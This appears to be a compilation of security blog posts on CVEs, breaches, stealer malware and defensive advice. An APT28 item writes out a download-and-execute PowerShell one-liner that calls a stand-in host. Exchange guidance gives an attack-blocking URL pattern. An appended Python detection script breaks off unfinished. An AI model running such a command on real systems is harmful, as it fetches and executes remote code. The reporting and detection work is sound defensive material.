IT NEWS

Actively exploited vulnerability in Bitbucket Server and Data Center

On September 29, 2022 the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to its Known Exploited Vulnerabilities catalog. One of them is a vulnerability in Atlassian’s Bitbucket Server and Data Center. The other two are the Exchange Server zero-day vulnerabilities we wrote about last week.

The Bitbucket vulnerability is not a zero-day: fixed versions were made available on August 24, 2022. The vulnerability allows an attacker who has read permission to execute arbitrary code by sending a malicious HTTP request.

Mitigation

All versions of Bitbucket Server and Data Center released after 6.10.17, including 7.0.0 and newer, are affected. Atlassian recommends that you upgrade your instance to one of the versions listed below.

Supported version and bug fix release:

  • Bitbucket Server and Data Center 7.6: 7.6.17 (LTS) or newer
  • Bitbucket Server and Data Center 7.17: 7.17.10 (LTS) or newer
  • Bitbucket Server and Data Center 7.21: 7.21.4 (LTS) or newer
  • Bitbucket Server and Data Center 8.0: 8.0.3 or newer
  • Bitbucket Server and Data Center 8.1: 8.1.3 or newer
  • Bitbucket Server and Data Center 8.2: 8.2.2 or newer
  • Bitbucket Server and Data Center 8.3: 8.3.1 or newer

You can download the latest version of Bitbucket from the download center. Visit the Frequently Asked Questions (FAQ) page if you have any questions.

If, for any reason, you are unable to apply the security updates, you are advised to apply temporary partial mitigation by turning off public repositories by setting the option feature.public.access to false. This blocks unauthorized users from accessing the repository.

If you access Bitbucket via a bitbucket.org domain, it is hosted by Atlassian and you are not affected by the vulnerability.

Vulnerability

The remote code execution vulnerability was found by Maxwell Garrett, a security researcher at Assetnote, and assigned CVE-2022-36804. The vulnerability was rated as critical, which indicates a CVSS score between 9 and 10 out of 10. If an attacker can read the content of a repository, either because it is a public repository or because they have read permission on a private repository, they are able to exploit the vulnerability.

Discovery

Bitbucket is a web-based hosting service that distributes source code and development projects. Typically, Bitbucket Server is deployed on-premises and allows uploads of source code from GitHub and other platforms. Bitbucket uses git for many operations within the software. The discovery was inspired by the blog post by William Bowling about his RCE via git option injection in GitHub Enterprise.

Exploitation

The proof-of-concept (PoC) exploit was made public on September 19, 2022. Attackers did not wait long. Some were observed scanning for vulnerable instances as early as September 20th.

Besides CISA adding the vulnerability to its Known Exploited Vulnerabilities list, the Belgian federal cyber emergency team (CERT.be) warned that an exploit kit is now available for CVE-2022-36804 and urged users to patch.

Now that CISA has set a to-be-patched date of October 21, 2022, the vulnerability will be higher on the agenda for US Federal Civilian Executive Branch (FCEB) agencies. As always, all other organizations are advised to patch urgently if they haven’t already.

Why (almost) everything we told you about passwords was wrong

I have an embarrassing confession to make: I reuse passwords.

I am not proud of it, but honestly it’s a relief to finally get it off my chest. I am not a heavy re-user, nothing crazy: I use a password manager to handle most of my credentials, but I still reuse the odd password from time to time.

It’s embarrassing to admit because recommending that users use unique passwords for each of their accounts is part of my job, and with good reason: Password reuse leads to credential stuffing, a form of automated attack where cybercriminals use lists of passwords stolen from one website to break into other websites. Credential stuffing attacks are large, automated, and persistent, and they are so successful that they happen almost constantly.

It seems obvious and important therefore to tell users not to reuse passwords. But telling them to stop doesn’t work and it never has. It doesn’t even work on me.

Why not?

I believe the reason is that for years we’ve been misdiagnosing the problem we thought we were solving. Consequently, we treated password reuse as a form of misbehavior that could be corrected rather than seeing it for what it is—a rational response to an impossible situation.

As computer and internet use exploded over the past forty years, the number of passwords each of us must remember has climbed precipitously.

The companies that make password managers are in broad agreement that we’re currently averaging a little less than 100 passwords each. Dashlane said its users have about 90 passwords; NordPass puts the figure at 70-80; and LastPass says it’s 85 passwords for employees of SMBs, and 25 passwords for people working in enterprises.

Me? I’ve got 742, and I’ve used 200 in the past year.

It simply isn’t possible to remember that many passwords, and the number of passwords we need to know probably exceeded the number we can remember decades ago.

In 2012, a group of researchers gave us a big clue about how small our capacity for remembering passwords is by looking at how often users forgot theirs, or got them mixed up. 84 percent of users with 7-9 passwords reported problems, and there was a precipitous decline in recall between users remembering 1-3 passwords and those remembering 4-6.

The sense that we can, at best, remember just a handful of passwords is reinforced by more research from 2018. In this study the participants had just 13 accounts each. Despite this relatively modest number, 91 percent resorted to password reuse, choosing to service their accounts with an average of 5.8 passwords each.

It was a snapshot of what had happened everywhere.

In the face of an ever-growing gap between the number of accounts and the number of passwords they could remember, users did the only things that made sense: They made their passwords weaker, so they were easier to remember; they wrote them down; and they reused them.

The collective response of the security community was to tell them to STOP: Don’t write them down; stop making them simpler; stop reusing them; and by the way please make every password a mixture of no fewer than fourteen uppercase, lowercase and wacky characters; oh, and please change your impossibly complex password for a different impossibly complex password as often as you change your underwear.

We should not have been surprised when we were completely ignored.

Nevertheless, we persisted for years. Some of the advice got better, but the bits about making strong passwords and not reusing them didn’t change even though password reuse remained endemic, and every data breach brought further evidence that users remain firmly wedded to very bad password choices.

Several years ago, experts at Microsoft Research and Carleton University, Canada did the math that explains what’s going on.

According to their calculations, a conscientious user with 100 unique, random passwords would have to perform an impossible feat of memory—the equivalent of remembering 1,362 random digits, a task that “far exceeds what users can manage by memorization”. You don’t say.

Many users’ first instinct is to make their passwords easier to remember, which makes them less secure. It helps, a bit, but it doesn’t come close to turning a 100-password portfolio into something a normal human can manage.

One of the “Eureka” moments in the research is that users don’t just have to remember their passwords, they have to remember which password goes with which account. Just that task alone is more difficult than remembering the order of a shuffled card deck.

No amount of weakening your passwords can overcome that. The only strategies that work are writing passwords down or reusing them.

One weird trick to improve your passwords

You may be reading this thinking that the answer to all of this is to use a password manager—a piece of software that can generate strong passwords and remember them for you.

Password managers are a potential answer to this problem, and advocating for them has been an important piece of security advice for several years now. However, despite all that advocacy only about 20% of us use one and almost half of us still don’t know what a password manager is. Teaching users to be better users is a long game.

More worryingly, buried deep within a 2016 password reuse study is the startling conclusion (with some caveats) that “third-party password managers do not significantly reduce password re-use across websites.” This probably requires more study, but from a personal perspective I can say that having a password manager has certainly helped my reuse problem, although it has not eliminated it.

But that isn’t password managers’ only trick: They can still generate strong passwords, and that’s good, right? Yes, it is, but we may have been seriously overestimating the importance of them.

In 2019, Microsoft’s Alex Weinert wrote that “When it comes to composition and length, your password (mostly) doesn’t matter.” And he’s not alone in believing that. Password strength just isn’t a factor that affects your security most of the time.

A strong password won’t protect you from a credential stuffing attack, phishing, or keylogging malware, for example.

Avoiding the most common form of attack—password spraying—where attackers use very short lists of very common passwords against lots of targets, requires only that you don’t use one of the 50 worst possible passwords (things like qwerty and 123456). You can have a very bad password indeed and still be safe from everything I’ve mentioned above. A modest password of just six characters or so will protect you from almost any kind of brute force attack conducted across the internet.

The only situation where password strength really matters is in an offline brute force attack where an attacker uses specialist hardware to crack the contents of a stolen password database. These attacks are very rare, but they are the reason you are asked to concoct 14-character masterpieces of uppercase, lowercase and wacky characters.

Solving the difficult edge case of offline password cracking by demanding all users create vastly more complex passwords than they otherwise need, either in their own head or with a password manager, seems like tilting at windmills. Defending against determined and well-resourced adversaries is a job for experts. We should be taking on the burden of defending against these attacks with better password management and storage rather than by demanding better users.

We need to stop and think about all the things we’re asking users to do. The more rules we offer, the less likely people are to follow any of them. And the more rules we offer that subsequently turn out to be counterproductive, such as demanding regular password resets, or valuing special characters over adding more characters, the more credibility we burn.

If we’re going to spend time advocating for a change in behaviour, we should probably pick one thing. And there is something that can make an enormous difference to password security, without users needing to worry about what passwords they use, where they store them and how often they use them: Multi-factor authentication (MFA).

The simple act of having to type in a code from an app alongside your password is a game changer—it kills credential stuffing, password spraying and brute force attacks stone dead.

Weinert: “Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA.”

Even better, while we can advocate for users adopting MFA where it’s available, we aren’t reliant on them listening. The most important thing is to persuade organizations, or better yet groups of organizations or even legislators, that it’s important. When that happens, users are just along for the ride.

So, from now on, my password advice is this: If you have time and energy to spare, find somewhere you’re not using MFA and set it up. If you do I promise never to nag you about how weak your passwords are or how often you reuse them ever again.

Two new Exchange Server zero-days in the wild

Microsoft has issued some customer guidance as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The company says it “is aware of limited targeted attacks using the two vulnerabilities to get into users’ systems.” The move follows discussion online about whether two new Exchange zero-days are really new vulnerabilities, or just new exploits for known vulnerabilities.

So, let’s start with the most important part: What should you do if you’re tasked with administering an Exchange Server? Microsoft is working on an accelerated timeline to release a fix. In the meantime it’s providing mitigations and detection guidance:

Microsoft Exchange Online customers do not need to take any action.

Users of the on-premises product should add a blocking rule in IIS Manager to block the known attack patterns. According to Microsoft, the following URL Rewrite instructions, which are currently being discussed publicly, are successful in breaking current attack chains:

  • Open the IIS Manager.
  • Expand the Default Web Site.
  • Select Autodiscover.
  • In the Feature View, click URL Rewrite.
  • In the Actions pane on the right-hand side, click Add Rules.
  • Select Request Blocking and click OK.
  • Add String .*autodiscover.json.*@.*Powershell.* and click OK.
  • Expand the rule and select the rule with the Pattern .*autodiscover.json.*@.*Powershell.* and click Edit under Conditions.
  • Change the condition input from {URL} to {REQUEST_URI}.

The instructions above can be found on the Microsoft blog, with screenshots. It adds that there is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.

Another option is to block the ports that are used for Remote PowerShell—HTTP: 5985 and HTTPS: 5986.

The vulnerabilities

The vulnerabilities were discovered by GTSC while performing security monitoring and incident response services. GTSC was able to determine that the attacks were based on exploit requests with the same format as ProxyShell. But the servers being attacked had all the latest updates, including those that stop ProxyShell.

The attacks were used to drop web shells on the Exchange servers—scripts that an attacker can use to run remote commands and maintain persistent access on an already compromised computer.

According to security researcher Kevin Beaumont, a significant number of Exchange servers have been backdoored. But he adds that this is not unusual, since the patching process is apparently such a mess that people end up on old Cumulative Updates and don’t patch ProxyShell properly.

On his blog on the subject he points out that if you don’t run Microsoft Exchange on-premises, and don’t have Outlook Web App (OWA) facing the internet, you are not impacted either. In addition, Microsoft also notes that attackers need authenticated access to the vulnerable Exchange Server in order to exploit either of the two vulnerabilities associated with these attacks.

The vulnerabilities, which are chained together, are:

CVE-2022-41040, a Server-Side Request Forgery (SSRF) vulnerability. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to other services within an organization’s infrastructure.

CVE-2022-41082, a vulnerability that allows remote code execution (RCE) when PowerShell is accessible to the attacker.

Fast Company hacked to send obscene and racist messages

Yesterday, Apple News announced it had disabled the channel of Fast Company, a US-based business magazine, after surprised Twitter users reported it was tweeting offensive comments.

Fast Company was hacked on Sunday, September 25. The attacker responsible modified article titles to obscene and racist things:

“Hacked by Vinny Troia. [redacted] tongue my [redacted]”, one title read.

This is what Fast Company looked like after it was hacked by an actor named “Thrax.”

Fast Company took its site offline to fix the defacement, but the hacker successfully got in again on Tuesday via its WordPress content management system, in order to push the same offensive text to its followers on Apple News.

Fast Company tweeted on Wednesday:

On Thursday, Fast Company’s website was displaying a statement regarding the hack on a black background.

“The messages are vile and are not in line with the content and ethos of Fast Company.”

While the company is working to resolve what happened, it said it will continue publishing stories on its social channels, including Facebook, LinkedIn, and TikTok.

Speaking with BleepingComputer, “Thrax” revealed how they hacked Fast Company’s website.

Thrax claimed they got into Fast Company after bypassing the basic HTTP authentication that protected the WordPress instance the company uses for its website. They then used a default password on “dozens” of accounts to take control of the CMS.

They then stole Auth0 tokens, Apple News API keys, and Amazon SES secrets. Using the tokens, “Thrax” says they created admin accounts on the CMS systems, which were then used to push out the notifications to Apple News.

Optus data breach “attacker” says sorry, it was a mistake

Since Australian telecoms company Optus disclosed a security breach on September 22, 2022, a lot has been happening.

Much of it reads like a movie script.

Prologue

A hacker acting under the pseudonym “optusdata” claims to have stolen the data of 10 million Optus customers. The information included home addresses, drivers’ licenses, Medicare numbers, and passport numbers. No passwords or financial details have been compromised.

Optus disclosed the breach on a dedicated page on its website. According to Kelly Bayer Rosmarin, Optus’ CEO:

“We are devastated to discover that we have been subject to a cyberattack that has resulted in the disclosure of our customers’ personal information to someone who shouldn’t see it.”

At this point we don’t know what exactly happened, but as always there are some interesting theories about it.

Optus says it has sent an email or SMS message to all the customers whose identification document numbers, such as driver’s license or passport number, were compromised as a result of the cyberattack.

Extortion

On an online forum, optusdata threatened to publish the data of 10,000 Optus customers per day unless they received $1 million in cryptocurrency. They began by posting the data of 10,200 customers.

In related activity, but probably not by the same threat actor, victims of the data breach have also started to receive text messages saying they must pay AUD 2,000 ($1,300) within two days or their data will be sold on for “fraudulent activity”. While the texts include the name “OptusData”, it is probably not the same person, and more likely to be someone who has simply gained access to the partial dataset that the original threat actor leaked.

Too much attention

The Australian Federal Police in cooperation with the FBI and other law enforcement organizations are investigating the data breach, and have launched Operation Hurricane.

We are aware of reports of stolen data being sold on the dark web and that is why the AFP is monitoring the dark web using a range of specialist capabilities. Criminals, who use pseudonyms and anonymizing technology, can’t see us but I can tell you that we can see them.

Apparently the heat has grown beyond what the threat actor could bear. In a statement on a forum where they announced the hack, they wrote:

“Too many eyes. We will not sale data to anyone. We cant if we even want to: personally deleted data from drive (Only copy)

Sorry too 10.200 Australian whos data was leaked.

Australia will see no gain in fraud, this can be monitored. Maybe for 10.200 Australian but rest of population no. Very sorry to you.

Deepest apology to Optus for this. Hope all goes well from this

Optus if your reading we would have reported exploit if you had method to contact. No security mail, no bug bountys, no way too message.

Ransom not payed but we dont care any more. Was mistake to scrape publish data in first place.”

Note: I left the typos alone since they may give an expert some clues about the writer’s first language.

Happy end?

Let’s start with the good news.

Australian victims of the Optus breach will be able to change their driver’s license numbers and get new cards. The New South Wales, Victoria, Queensland, and South Australia governments have started clearing bureaucratic hurdles for anyone who can prove they are victims of the hack. Optus is expected to bear the multimillion-dollar cost of the changeover.

There is also talk about a class action lawsuit.

Optus is offering customers the option to take up a 12-month subscription to a credit monitoring and identity protection service.

The Commonwealth Bank confirmed it had identified and blocked the account of the SMS extortionist.

All the customers who have an unexpired Medicare card will be contacted by Optus. There are a further 22,000 expired Medicare card numbers that were exposed, and the holders of those cards will also be contacted directly. It’s worth noting that Optus says personal information cannot be accessed using just a Medicare number.

The bad news is, of course, in the uncertainty. Can we really trust the threat actor when they claim they have deleted the data? They have proven to be a criminal, so why would we take their word for it? We can’t even be a hundred percent sure that the person posting that statement is the actual holder of the data.

So, stay safe and be on the lookout for the phishing campaigns that will undoubtedly try to bank on these events.

We will keep you updated here if the plot decides to take another turn.

Local government cybersecurity: 5 best practices

It seems like not a day goes by where we don’t hear about a local government cyberattack. Indeed, from 911 call centers to public schools, cyberattacks on local governments are as common as they are devastating. 

Just how often do threat actors attack local governments? A survey of 14 mainly larger US local governments found that just over half of respondents said they suffer attacks constantly, more than a quarter said hourly, and 14.3% said daily. 

Local governments continue to be a common cyberattack target for two big reasons. The first is that they handle troves of sensitive data, especially personally identifiable information (PII), and the second is that they operate on shoestring budgets with little to no cybersecurity staff or leadership buy-in. 

Now, factor in these two reasons with the sheer number of local governments out there in the United States—90,075 units—and you have a huge, vulnerable, and valuable target. Sounds like easy pickings for attackers, but it doesn’t have to be. 

With a few best practices, local governments can improve their cybersecurity posture and make it less likely that threat actors attack their systems. We’ll break down five best practices for local government cybersecurity in this post.

Table of Contents
1. Take cybersecurity assessments to find and address weaknesses
2. Adopt the fundamentals
3. Partner up!
4. Build a playbook for ransomware response and recovery
5. Consider outsourcing

1. Take cybersecurity assessments to find and address weaknesses

Cybersecurity consultants and the professional literature agree: You should adopt cybersecurity policies such as the NIST Framework to help prevent and respond to attacks. And a key part of building out any cybersecurity policy for your local government is to develop an organizational understanding of risk to systems, people, data, and so on. 

There are tons of free cybersecurity assessments for State, Local, Tribal and Territorial (SLTT) governments that you can take to get started. After performing the assessments, you can compare your results to the NIST criteria to identify gaps and deficiencies to be improved.

  1. Cyber Infrastructure Survey (CIS): A free assessment of the essential cybersecurity practices in place for critical services. Conducted by the US Department of Homeland Security (DHS).
  2. Cyber Resilience Review (CRR): The CRR assessment evaluates your organization’s operational resilience and cybersecurity practices. Also conducted free of charge by the DHS.
  3. Phishing Campaign Assessment (PCA): Evaluates an organization’s susceptibility and reaction to phishing emails. Conducted free of charge by the National Cybersecurity Assessments and Technical Services (NCATS) team.
  4. Cybersecurity Evaluation Tool (CSET®): A stand-alone desktop application that guides asset owners in evaluating their cybersecurity posture against recognized standards. Also delivered free of charge by the NCATS team.
  5. Risk and Vulnerability Assessment (RVA): A one-on-one engagement that gives organizations an actionable risk analysis report containing remediation recommendations prioritized by severity and risk.

2. Adopt the fundamentals  

The unfortunate reality is that an inability to pay competitive salaries, an insufficient number of staff, and a lack of funds are big barriers to local government cybersecurity. However, there are still plenty of important cybersecurity fundamentals that local governments should try to adopt to the fullest extent possible.

Take cyber insurance, for example. Cyber insurance can prevent local governments from having to pay huge out-of-pocket costs in the event that they’re hit with a cyberattack. Baltimore learned this the hard way.

(An important caveat here is that cyber insurance is becoming increasingly expensive: check out our article on 4 ways to save money on cyber insurance).

Cybersecurity best practices don’t just help you stay safe—they can also make you eligible for grant funding. In particular, local governments looking to be eligible for the State and Local Cybersecurity Grant Program must include these best practices in their cybersecurity plan:

  1. Multi-factor authentication (MFA)
  2. Enhanced logging
  3. Data encryption for data at rest and in transit
  4. End use of unsupported/end of life software and hardware that are accessible from the Internet 
  5. Prohibit use of known/fixed/default passwords and credentials 

In addition, only 23% of local governments have adopted the .gov domain, meaning a majority of local governments are missing out on one of the simplest ways to strengthen their cybersecurity posture. Sponsored by CISA, the Cybersecurity and Infrastructure Security Agency, the .gov domain comes with several key security benefits:

  • MFA is enforced on all accounts in the .gov registrar, and user accounts cannot use passwords that have been found in known data breaches.
  • It ‘preloads’ all new domains, which lets web browsers know to always use HTTPS to connect with any website on that domain.
  • CISA, GSA, and the National Institute of Standards and Technology (NIST) help monitor for issues in the namespace.

To obtain a .gov domain or to learn more, check out some of the resources below. 

3. Partner up!

Local governments may be resource-constrained, but the good news is that they don’t have to face cybersecurity alone. State governments, together with Federal, university, and even nonprofit partners, can be strong allies to local government cybersecurity.

4. Build a playbook for ransomware response and recovery 

For local governments especially, a ransomware attack is a matter of ‘when’ and not ‘if’. However, they might not have the budget or staff to implement and use anti-ransomware solutions such as Endpoint Detection and Response (EDR).

Fortunately, you don’t need any fancy technology to start building a solid ransomware response and recovery plan. NIST recommends that organizations follow these steps to accelerate their recovery, among others: 

  • Data backup and restoration strategy: Backups are a prime target for attackers, so keep multiple copies of your data, and make sure at least one of them is offline.

  • Know who you’re going to contact: Maintain an up-to-date list of internal and external stakeholders to contact in the event of an attack, which may include senior management, PR, your legal team, insurance providers, vendors, and law enforcement.

In our Ransomware Emergency Kit, you’ll find more resources your local government needs to understand threats, prevent attacks, and defend against cybercriminals.

5. Consider outsourcing

Though CISOs might be wary about having their data handled by an outside organization, many local governments rely on vendors and managed service providers (MSPs) to provide some or all of their cybersecurity operations. 

A 2020 survey of 165 municipalities found 50.9% outsourced some of their cybersecurity functions, with almost 60% citing “Lack of local skilled professionals” as a reason for outsourcing. Some of the functions commonly outsourced are:

“By working with a trusted partner or service provider, local governments can fast track to get their security stack up to par,” said David Pier, Team Lead, Corporate Solutions Engineering at Malwarebytes. “Many frameworks and security plans can take upwards of multiple years to successfully implement and audit for certification. If they can pass this work along to their partners, it circumvents the need for them to commit to a lengthy process in addition to the complexity of implementation.”

Read “Risk Considerations for Managed Service Provider Customers” from CISA for more information for local governments choosing an MSP.


Enhancing local government cybersecurity

A lack of funding and staff makes local government cybersecurity tough, period. 

However, if every local government implemented these five best cybersecurity practices today, they could dramatically lessen the likelihood and fallout of an attack—and increase eligibility for the State and Local Cybersecurity Grant Program while they’re at it.

Malwarebytes has ample experience providing local governments and public schools with effective, intuitive, and inclusive cyberprotection. Read the case studies below to learn more:

Check out our government case studies and education pages for more information.

4 times students compromised school cybersecurity

For many students school can be a tough time, and we’ve all heard stories about bored or frustrated kids compromising school cybersecurity to change grades. Sometimes the students are celebrated, and other times it ends in them being expelled from school, or even prosecuted. 

Of course, these acts of compromising school security are against the law. In 1986, the Computer Fraud and Abuse Act (CFAA) was enacted as an amendment to the first federal computer fraud law, to address hacking. The CFAA prohibits intentionally accessing a computer without authorization or in excess of authorization.

And the sentences are not mild. Accessing a computer to defraud and obtain value (such as raising your grades) could end in a five-year prison sentence!

Here are four times school cybersecurity failed, and students got up to no good:

1. Rickrolling an entire school district

A student at a high school in Cook County successfully hacked into the Internet-of-Things (IoT) devices of one of the largest school districts in Illinois, and gave everyone a surprise.

In a personal blog the student wrote:

“I did it by hijacking every networked display in every school to broadcast ‘Never Gonna Give You Up’ in perfect synchronization. Whether it was a TV in a hall, a projector in a classroom, or a jumbotron displaying the lunch menu, as long as it was networked, I hacked it!”

Now, that is high-level rickrolling! And he was lucky enough to find an understanding audience. The director stated that because of its guidelines and documentation, the district would not be pursuing discipline. In fact, they thanked the rickroller for their findings and asked them to present a debrief to the tech team.

2. Guilty until proven innocent

A Canadian student at Tufts University’s veterinary school was expelled for an elaborate months-long scheme involving stealing and using university logins to break into the student records system, view answers, and alter her own and other students’ grades.

Since her visa was no longer valid after she got expelled, she had to leave the US immediately. With tens of thousands of dollars in student debt and no prospect of her becoming a veterinarian, her life was in shambles.

She provided Tufts with information about her whereabouts at the times of the alleged hacks, but her alibis were dismissed. She scanned her MacBook Air—the source of the alleged hacks—and the scan showed that the machine was itself compromised. Within minutes, several malicious files were found, chief among which were two remote access trojans (RATs).

Like any private university, Tufts can discipline and expel a student for almost any reason. So they did not have to prove she was guilty; she had to prove beyond any reasonable doubt that she was innocent, and she was unable to convince them.

3. 12-year-olds pwn their school district

The hack started small, in seventh grade, when the students bypassed their middle school’s internet filters to watch YouTube during lunch. But by the time Jeremy Currier and Seth Stephens were caught more than two years later, their exploits had given them extraordinary reach into the computer network of the Rochester Community Schools. They literally had access to everything. The boys were even using district servers to mine for cryptocurrency.

As a consequence, the district expelled both of them, then referred them to the county sheriff’s office. Their long-term employment prospects should have been bright, with many organizations looking for skilled cybersecurity workers. Sadly, the boys are unlikely to be eligible for many of those public-sector positions as it’s now unlikely they will be able to pass a background check and get security clearance.

4. Homecoming queen rigs contest, allegedly

When Emily Grover was named homecoming queen, her school accused her and her vice principal mother of hacking students’ accounts to sway the election.

The pair allegedly used the mother’s login to the school computer system to harvest student IDs and birthdates. These were then used to cast 246 fake votes on Election Runner—a third-party app used by the school to run the election—from the mother’s cell phone and a computer at her home.

The duo claim to be innocent and refused a no-jail plea agreement, despite facing a maximum penalty of 16 years in jail.

Grover was forbidden from graduating with her class and received a letter from the University of Western Florida saying she was no longer welcome there.

The crime and the consequences

One thing all these cases have in common is basic security lapses at the educational institutions involved: plaintext passwords in log files, passwords on sticky notes, and wide open networks.

But even if the door is left open, it is still illegal to enter.

Should you find such an open door, warn your IT staff about it and don’t take advantage of it. Getting caught could do a lot more damage than a bad grade or only being the runner-up in a homecoming queen contest.

Erbium stealer on the hunt for data

There’s a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims. Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines.

A slick tool with its own fully functional dashboard, Erbium sets its sights on targets not entirely dissimilar to those of other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer.

Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication (2FA) data. Connections are made to Discord’s Content Delivery Network in order to potentially download more malware. According to the latest research available, it leans into that well-worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, and Pale Moon, and even the email client Thunderbird gets a mention.

In fact, many of the cryptocurrency wallets targeted are browser extensions. According to Bleeping Computer, this includes iWallet, Clover Wallet, Steem Keychain, ZilPay and many more. Several cold wallets are also in the malware’s crosshairs, and to top it all off it does of course have the ability to take screenshots of the victim’s desktop.

The most recent campaign described by researchers uses well-worn tricks which never seem to go out of fashion. Specifically: malware stored on free file hosting, posing as cheats or cracks. Using free file hosting for malware storage makes it easy for its operators to set up shop somewhere else, should the malware be taken down by the hosts.

The attackers are said to make use of drive-by download techniques to spread the files—a term that covers all forms of unintended software installation, such as software installed via browser exploits, or bundled with legitimate downloads. There are no more specifics, but outside of this campaign, it is very common to see these sorts of files promoted on fake YouTube videos or even in the comments under legitimate videos.

Once enough data is gathered by the malware authors, it’s off to the underground marketplaces to trade and/or sell the stolen information. Erbium has become very popular in recent months, with Bleeping Computer reporting the cost of doing business has risen from $9 per week to $100 per month.

Competition is fierce in malware-as-a-service land, but Erbium seems to be sticking around.

Users of Malwarebytes are protected from the two payloads mentioned in the Duskrise article, and the various payloads listed in the Cyfirma writeup.

Stay safe out there!

Spyware disguises itself as Zoom downloads

Zoom video call software continues to be a staple in work environments. Despite a slow, post-lockdown easing back to the “old normal,” many businesses still have remote workers, or people working in different geographies. It’s no surprise then to see criminals continuing to abuse Zoom’s popularity, in the hope of netting interested parties and, potentially, luring current users into downloading and installing malware.

This particular campaign, initially discovered by an Internet researcher going by the handle @idclickthat, gets unsuspecting users to download an information-stealer—spyware, if you prefer—from fake sites hosting malformed Zoom installers (malware bundled with a legitimate Zoom installer) onto their work systems.

Further analysis from researchers at Cyble reveals this spyware is known as the Vidar Stealer, which Cyble did a deep dive on last year. Vidar steals user credentials, banking information, saved passwords, IP addresses, and other sensitive information. Findings reveal six fake Zoom download sites, but they are no longer accessible. According to idClickThat, the only difference between the home page of the fake Zoom download sites and the real one is the addition of a “download” button in the main image.

It isn’t clear how users encountered these fake download sites, but those that did downloaded a file called Zoom.exe. Once executed, it dropped two payloads: the legitimate software installer and malware named Decoder.exe, which then dropped the Vidar malware. This spyware was then injected into MSBuild.exe, a platform used to build applications.

Once injected, Vidar extracted command-and-control IP addresses from two profiles created on Telegram and ieji.de, an anonymous social platform based on an instance of Mastodon. These URLs, per Cyble researchers, house DLL files and configuration data the spyware needs to function.

Note that information stealers like Vidar can harvest credentials that put your business network at risk. Threat actors can sell this access to the highest bidders, who can use it to break into your company network, steal information and plant ransomware.

So, before downloading files that claim to be legitimate, it pays to do a quick online search for the software’s official website. Of course it also pays to have good security software that blocks malware, so that accidents can be stopped before they turn into a problem for your computer and your employer’s network.

Stay safe!

APT28 attack uses old PowerPoint trick to download malware

Researchers at Cluster25 have published research about exploit code that’s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft’s Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to APT28, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren’t a target isn’t a good defense strategy.

Malicious mouseover

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering the mouse over a link can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

This downloads a script (malice.ps1 in my example) that can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:\ProgramData\lmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

Mitigation

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office’s Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on File > Options, then Trust Center > Trust Center Settings > Protected View to view the active settings.
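A detection check that follows from the mitigation advice above: any run of SyncAppvPublishingServer.exe is suspicious on a host without the App-V client, and one spawned by an Office application or carrying a download-and-execute command line is suspicious anywhere. This is an added example, not code from the article or from Cluster25; it assumes JSON-lines process-creation events with Image, CommandLine and ParentImage fields (the shape of a Sysmon Event ID 1 export), and the sample events are constructed with placeholder names.

```python
"""Added example, not from the article or Cluster25: flag process-creation
events that match the SyncAppvPublishingServer mouseover technique above.
Assumes JSON-lines events with Image, CommandLine, ParentImage (Sysmon ID 1)."""
import json
import re

# Substrings showing the utility is being used to fetch and run remote code.
REMOTE_EXEC_MARKERS = ("net.webclient", "downloadstring", "iex", "invoke-expression", "http")
# A legitimate App-V sync is never launched by an Office application.
OFFICE_PARENTS = ("powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe")

def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event: dict[str, str], appv_in_use: bool) -> str:
    """Return 'high', 'medium' or 'none' for one process-creation event."""
    if basename(event.get("Image", "")) != "syncappvpublishingserver.exe":
        return "none"
    cmd = event.get("CommandLine", "").lower()
    parent = basename(event.get("ParentImage", ""))
    if any(m in cmd for m in REMOTE_EXEC_MARKERS) or parent in OFFICE_PARENTS:
        return "high"    # download-and-execute pattern, or spawned by Office
    # Any other run is unexpected on a host without the App-V client.
    return "none" if appv_in_use else "medium"

def scan(lines: list[str], appv_in_use: bool = False) -> list[tuple[str, str]]:
    """Return (severity, command line) for every event that is not benign."""
    hits = []
    for line in lines:
        event = json.loads(line)
        severity = classify(event, appv_in_use)
        if severity != "none":
            hits.append((severity, event.get("CommandLine", "")))
    return hits

# Constructed sample events (placeholder host and script names, not real IoCs).
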